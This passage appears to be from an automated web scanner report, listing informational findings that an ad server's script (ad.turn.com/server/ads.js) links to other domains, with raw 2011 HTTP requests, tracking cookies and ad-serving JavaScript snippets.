7OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq
29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGp4OSJWgeI3Ow76nnBboeSngJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA3FI1v0pIp1Oq279aEkk1j6WhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyIjDPzDEEzts25-A_eYUS74d88E5NxpHVycir8QBFmIqyIxNLNbqy6vHlykIVOX3LklZBgm0y1exivcb_gfhBEDWb6jHmyzw4IbjqaiC8Out2XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Set-Cookie: pf=Mgovx84h_Ov--Xj3--F0rsLmce8wzSDXw3BvrEZAKNiJwV9kSIzX4BtZ7vBDkFqivBHW9RKwIdLIwhhMny1M2H4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:09 GMT
Content-Length: 10132


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
95%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=7951675187229449762?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=7951675187229449762?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.88. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 17:37:29 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=93BCq0WTCVMxF4AWDa_UBzGK2WVGmSebj4padkL3fXlh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKX8qYrC9FMnU5Q2wRAYDGypi9OYrtG-b0iAWL5Sg__z6OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz
59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuV6ONoHWtyiE_pNTuBZXnxgi4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: fc=4eSwQ3g1tAr0ps2Jsn-_eWoVwDvXeel54vyZXm8QLISGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOemGrp6DlmlaGmQt2qcOx1gg; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: pf=xRx_CDsAoWoco5w3DRjwyiu1jndAIQSkfSH7IRm-hA2JwV9kSIzX4BtZ7vBDkFqiIdgy2Lx6nc2yvIrh5BEVs34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 17:37:28 GMT
Content-Length: 9353


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
<a href="http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp?FlightID=1891435&Page=&PluID=0&Pos=8470" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=1891435&Page=&PluID=0&Pos=8470" border=0 width=728 height=90></a>
...[SNIP]...

17.89. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /server/ads.js?&pub=6264177&code=14383608&cch=14381728&l=728x90&tmz=-6&area=0&res=1920&rnd=0.4859149551484734&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=a23_XVoqSlKtCC-2lTx1mK8Atn0oO5LfCaNOF46MJQVh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKT4Z56e4E96NaNZjC_AOT217oTThsnNqViHEtNUDKqf-OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz59qa
jUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuAOwss-vu9H2Leed6bKEL9Ai4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; 
pf=P2ulGxJH0L6sP7i92CPecgAmiI2Lsig78fIY2fHGbzuJwV9kSIzX4BtZ7vBDkFqiEUMyLdhTUOk0HUHTgKulxX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
